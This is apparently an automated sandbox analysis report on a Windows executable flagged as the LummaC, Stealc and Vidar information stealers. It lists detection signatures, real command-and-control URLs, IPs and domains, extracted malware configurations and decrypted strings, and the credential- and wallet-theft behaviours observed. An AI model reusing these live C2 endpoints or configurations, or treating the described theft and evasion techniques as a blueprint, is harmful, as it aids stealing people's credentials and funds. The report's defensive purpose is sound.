Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1500787
MD5: 8e41d2107579afb2911dccffeab97f1c
SHA1: e364f0f9b85adcb64747c8eac819a1b59b458727
SHA256: c5c219a6512dc639b5ac5837abe4217e265f7d165159da131eb32048b0c15030
Tags: exe

Detection

LummaC, Stealc, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected Stealc
Yara detected Vidar
Yara detected Vidar stealer
.NET source code contains very large array initializations
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Found evasive API chain (may stop execution after checking locale)
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
Searches for specific processes (likely to inject)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
Lumma Stealer, LummaC2 Stealer Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in the C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
Stealc Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, extensions and desktop applications of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
Vidar Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA software and Tor Browser. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

AV Detection

Source: http://46.8.231.109/c4754d4f680ead72.php Avira URL Cloud: Label: malware
Source: http://46.8.231.109/c4754d4f680ead72.phpb Avira URL Cloud: Label: malware
Source: http://147.45.68.138/nss3.dll Avira URL Cloud: Label: malware
Source: https://t.me/iyigunl Avira URL Cloud: Label: malware
Source: http://46.8.231.109/c4754d4f680ead72.phpnu Avira URL Cloud: Label: malware
Source: https://condedqpwqm.shop/api. Avira URL Cloud: Label: malware
Source: http://46.8.231.109/1309cdeb8f4c8736/msvcp140.dll Avira URL Cloud: Label: malware
Source: http://46.8.231.109/1309cdeb8f4c8736/softokn3.dll# Avira URL Cloud: Label: malware
Source: http://46.8.231.109/1309cdeb8f4c8736/sqlite3.dll_ Avira URL Cloud: Label: malware
Source: https://condedqpwqm.shop/api45 Avira URL Cloud: Label: phishing
Source: https://steamcommunity.com/profiles/76561199761128941 Avira URL Cloud: Label: malware
Source: http://46.8.231.109/1309cdeb8f4c8736/mozglue.dlli Avira URL Cloud: Label: malware
Source: http://46.8.231.109/1309cdeb8f4c8736/softokn3.dll Avira URL Cloud: Label: malware
Source: https://condedqpwqm.shop/apitK Avira URL Cloud: Label: phishing
Source: http://147.45.68.138/vcruntime140.dll Avira URL Cloud: Label: malware
Source: http://46.8.231.109/c4754d4f680ead72.phpC Avira URL Cloud: Label: malware
Source: http://46.8.231.109/c4754d4f680ead72.phpry=----IDHIIJJJKEGIDGCBAFIJdefaultrelease Avira URL Cloud: Label: malware
Source: https://t.me/jamelwt#cp Avira URL Cloud: Label: malware
Source: http://147.45.44.104/prog/66cf75d3791d7_vrewqgq.exe Avira URL Cloud: Label: malware
Source: http://147.45.68.138/mozglue.dll Avira URL Cloud: Label: malware
Source: http://46.8.231.109/1309cdeb8f4c8736/freebl3.dll Avira URL Cloud: Label: malware
Source: locatedblsoqp.shop Avira URL Cloud: Label: phishing
Source: caffegclasiqwp.shop Avira URL Cloud: Label: malware
Source: millyscroqwp.shop Avira URL Cloud: Label: malware
Source: http://46.8.231.109/1309cdeb8f4c8736/nss3.dlls Avira URL Cloud: Label: malware
Source: http://46.8.231.109 Avira URL Cloud: Label: malware
Source: http://46.8.231.109/1309cdeb8f4c8736/mozglue.dll Avira URL Cloud: Label: malware
Source: http://46.8.231.109/c4754d4f680ead72.php:# Avira URL Cloud: Label: malware
Source: http://46.8.231.109/c4754d4f680ead72.phpw Avira URL Cloud: Label: malware
Source: http://46.8.231.109/1309cdeb8f4c8736/softokn3.dll- Avira URL Cloud: Label: malware
Source: http://147.45.68.138/freebl3.dll Avira URL Cloud: Label: malware
Source: traineiwnqo.shop Avira URL Cloud: Label: malware
Source: http://46.8.231.109/1309cdeb8f4c8736/nss3.dll( Avira URL Cloud: Label: malware
Source: condedqpwqm.shop Avira URL Cloud: Label: phishing
Source: https://condedqpwqm.shop/T Avira URL Cloud: Label: phishing
Source: http://147.45.68.138/sql.dll Avira URL Cloud: Label: malware
Source: http://147.45.68.138/softokn3.dll Avira URL Cloud: Label: malware
Source: stamppreewntnq.shop Avira URL Cloud: Label: phishing
Source: stagedchheiqwo.shop Avira URL Cloud: Label: phishing
Source: http://147.45.68.138/msvcp140.dll Avira URL Cloud: Label: malware
Source: http://46.8.231.109/ Avira URL Cloud: Label: malware
Source: http://46.8.231.109/1309cdeb8f4c8736/nss3.dll Avira URL Cloud: Label: malware
Source: 0000001B.00000002.1383374725.00000000038B5000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199761128941", "https://t.me/jamelwt"], "Botnet": "d9949d63cb2f6fce6f80667c0c98ea24"}
Source: 00000003.00000002.1384359989.000000000140A000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: StealC {"C2 url": "http://46.8.231.109/c4754d4f680ead72.php"}
Source: 24.2.RegAsm.exe.400000.0.raw.unpack Malware Configuration Extractor: LummaC {"C2 url": ["locatedblsoqp.shop", "caffegclasiqwp.shop", "traineiwnqo.shop", "evoliutwoqm.shop", "millyscroqwp.shop", "stagedchheiqwo.shop", "condedqpwqm.shop", "stamppreewntnq.shop"], "Build id": "H8NgCl--"}
Source: C:\ProgramData\HDAFIIDAKJ.exe ReversingLabs: Detection: 32%
Source: C:\Users\userIEHDAFHDHC.exe ReversingLabs: Detection: 32%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\66cf75d3791d7_vrewqgq[1].exe ReversingLabs: Detection: 32%
Source: file.exe ReversingLabs: Detection: 31%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\ProgramData\HDAFIIDAKJ.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\66cf75d3791d7_vrewqgq[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\66cf818156193_ldjfnsfd[1].exe Joe Sandbox ML: detected
Source: C:\Users\userFBKFCFBFID.exe Joe Sandbox ML: detected
Source: C:\Users\userIEHDAFHDHC.exe Joe Sandbox ML: detected
Source: C:\ProgramData\DHCGHDHIDH.exe Joe Sandbox ML: detected
Source: file.exe Joe Sandbox ML: detected
Source: 24.2.RegAsm.exe.400000.0.raw.unpack String decryptor: caffegclasiqwp.shop
Source: 24.2.RegAsm.exe.400000.0.raw.unpack String decryptor: stamppreewntnq.shop
Source: 24.2.RegAsm.exe.400000.0.raw.unpack String decryptor: stagedchheiqwo.shop
Source: 24.2.RegAsm.exe.400000.0.raw.unpack String decryptor: millyscroqwp.shop
Source: 24.2.RegAsm.exe.400000.0.raw.unpack String decryptor: evoliutwoqm.shop
Source: 24.2.RegAsm.exe.400000.0.raw.unpack String decryptor: condedqpwqm.shop
Source: 24.2.RegAsm.exe.400000.0.raw.unpack String decryptor: traineiwnqo.shop
Source: 24.2.RegAsm.exe.400000.0.raw.unpack String decryptor: locatedblsoqp.shop
Source: 24.2.RegAsm.exe.400000.0.raw.unpack String decryptor: condedqpwqm.shop
Source: 24.2.RegAsm.exe.400000.0.raw.unpack String decryptor: lid=%s&j=%s&ver=4.0
Source: 24.2.RegAsm.exe.400000.0.raw.unpack String decryptor: TeslaBrowser/5.5
Source: 24.2.RegAsm.exe.400000.0.raw.unpack String decryptor: - Screen Resoluton:
Source: 24.2.RegAsm.exe.400000.0.raw.unpack String decryptor: - Physical Installed Memory:
Source: 24.2.RegAsm.exe.400000.0.raw.unpack String decryptor: Workgroup: -
Source: 24.2.RegAsm.exe.400000.0.raw.unpack String decryptor: H8NgCl--
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00409BB0 CryptUnprotectData,LocalAlloc,memcpy,LocalFree, 3_2_00409BB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00418940 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA, 3_2_00418940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_0040C660 memset,lstrlenA,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,lstrcat,lstrcat,PK11_FreeSlot,lstrcat, 3_2_0040C660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00407280 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree, 3_2_00407280
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00409B10 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree, 3_2_00409B10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CB56C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer, 3_2_6CB56C80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CCAA9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util, 3_2_6CCAA9A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_00406AB6 CryptUnprotectData,LocalAlloc,LocalFree, 29_2_00406AB6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_0040F8D5 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA, 29_2_0040F8D5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_00406A53 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree, 29_2_00406A53
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_004083FA memset,lstrlenA,CryptStringToBinaryA,memcpy,lstrcatA,lstrcatA, 29_2_004083FA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6C9C6C80 CryptQueryObject,CryptMsgGetParam,CryptMsgGetParam,CertFindCertificateInStore,CertGetNameStringW,CertGetNameStringW,CertFreeCRLContext,CryptMsgClose,CertCloseStore,CryptQueryObject,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,GetLastError,CryptBinaryToStringW,GetLastError,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer, 29_2_6C9C6C80
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 172.67.146.35:443 -> 192.168.2.7:49712 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.146.35:443 -> 192.168.2.7:49715 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.7:49730 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.146.35:443 -> 192.168.2.7:49735 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.146.35:443 -> 192.168.2.7:49736 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.7:49740 version: TLS 1.2
Source: file.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: mozglue.pdbP source: RegAsm.exe, 00000003.00000002.1426905335.000000006CBBD000.00000002.00000001.01000000.00000009.sdmp, RegAsm.exe, 0000001D.00000002.1948243243.000000002A890000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1976265384.000000006CA35000.00000002.00000001.01000000.00000009.sdmp, mozglue[1].dll.3.dr, mozglue[1].dll.29.dr, mozglue.dll.3.dr
Source: Binary string: freebl3.pdb source: RegAsm.exe, 0000001D.00000002.1944158611.000000002492D000.00000004.00000020.00020000.00000000.sdmp, freebl3[1].dll.3.dr, freebl3.dll.3.dr, freebl3[1].dll.29.dr
Source: Binary string: freebl3.pdbp source: RegAsm.exe, 0000001D.00000002.1944158611.000000002492D000.00000004.00000020.00020000.00000000.sdmp, freebl3[1].dll.3.dr, freebl3.dll.3.dr, freebl3[1].dll.29.dr
Source: Binary string: nss3.pdb@ source: RegAsm.exe, 00000003.00000002.1427642500.000000006CD7F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 0000001D.00000002.1966611743.000000004264F000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, nss3.dll.3.dr, nss3[1].dll.29.dr
Source: Binary string: c:\par8k7z\obj\Re\ease\fsB.pdb0, source: file.exe
Source: Binary string: c:\sl1g47f51c90hn\obj\Re\ease\fsB.pdb source: 66cf818156193_ldjfnsfd[1].exe.3.dr, userFBKFCFBFID.exe.3.dr, DHCGHDHIDH.exe.29.dr
Source: Binary string: softokn3.pdb@ source: RegAsm.exe, 0000001D.00000002.1959106778.000000003676F000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.3.dr, softokn3.dll.3.dr, softokn3[1].dll.29.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: RegAsm.exe, 0000001D.00000002.1963284287.000000003C6D1000.00000004.00000020.00020000.00000000.sdmp, vcruntime140.dll.3.dr, vcruntime140[1].dll.29.dr, vcruntime140[1].dll.3.dr
Source: Binary string: c:\sl1g47f51c90hn\obj\Re\ease\fsB.pdb0 source: 66cf818156193_ldjfnsfd[1].exe.3.dr, userFBKFCFBFID.exe.3.dr, DHCGHDHIDH.exe.29.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: RegAsm.exe, 0000001D.00000002.1955580137.00000000307F1000.00000004.00000020.00020000.00000000.sdmp, msvcp140[1].dll.3.dr, msvcp140.dll.3.dr
Source: Binary string: nss3.pdb source: RegAsm.exe, 00000003.00000002.1427642500.000000006CD7F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 0000001D.00000002.1966611743.000000004264F000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, nss3.dll.3.dr, nss3[1].dll.29.dr
Source: Binary string: mozglue.pdb source: RegAsm.exe, 00000003.00000002.1426905335.000000006CBBD000.00000002.00000001.01000000.00000009.sdmp, RegAsm.exe, 0000001D.00000002.1948243243.000000002A890000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1976265384.000000006CA35000.00000002.00000001.01000000.00000009.sdmp, mozglue[1].dll.3.dr, mozglue[1].dll.29.dr, mozglue.dll.3.dr
Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 0000001D.00000002.1937546619.000000001E56E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1943691071.00000000244D8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.2215879261.000000002232B000.00000002.00001000.00020000.00000000.sdmp, sql[1].dll.29.dr
Source: Binary string: softokn3.pdb source: RegAsm.exe, 0000001D.00000002.1959106778.000000003676F000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.3.dr, softokn3.dll.3.dr, softokn3[1].dll.29.dr
Source: Binary string: c:\6yuam8\obj\Re\ease\fsB.pdb0 source: HDAFIIDAKJ.exe.29.dr, 66cf75d3791d7_vrewqgq[1].exe.3.dr, userIEHDAFHDHC.exe.3.dr
Source: Binary string: c:\6yuam8\obj\Re\ease\fsB.pdb source: HDAFIIDAKJ.exe.29.dr, 66cf75d3791d7_vrewqgq[1].exe.3.dr, userIEHDAFHDHC.exe.3.dr
Source: Binary string: c:\par8k7z\obj\Re\ease\fsB.pdb source: file.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_0040D8C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 3_2_0040D8C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_0040F4F0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 3_2_0040F4F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_0040BCB0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 3_2_0040BCB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_004139B0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 3_2_004139B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_0040E270 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, 3_2_0040E270
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00401710 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 3_2_00401710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_004143F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 3_2_004143F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_0040DC50 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 3_2_0040DC50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00414050 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlenA,lstrlenA, 3_2_00414050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_0040EB60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,FindNextFileA,FindClose, 3_2_0040EB60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_004133C0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,FindNextFileA,FindClose, 3_2_004133C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_00413540 wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcatA,strtok_s,memset,lstrcatA,PathMatchSpecA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,FindNextFileA,FindClose, 29_2_00413540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_0040B969 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 29_2_0040B969
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_0041425C wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose, 29_2_0041425C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_00413B50 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose, 29_2_00413B50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_00409B68 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA, 29_2_00409B68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_0040AB08 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 29_2_0040AB08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_00409317 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 29_2_00409317
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_004013B4 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose, 29_2_004013B4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_00409645 StrCmpCA,FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 29_2_00409645
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_0040A2C1 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,FindNextFileA,FindClose, 29_2_0040A2C1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_00413EA0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA, 29_2_00413EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_0041391C GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA, 29_2_0041391C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov eax, dword ptr [esp+1Ch] 24_2_0040C000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov ecx, dword ptr [esp] 24_2_0040B810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov ecx, dword ptr [ebp-14h] 24_2_0043BC78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov edx, dword ptr [esp] 24_2_0040CC80
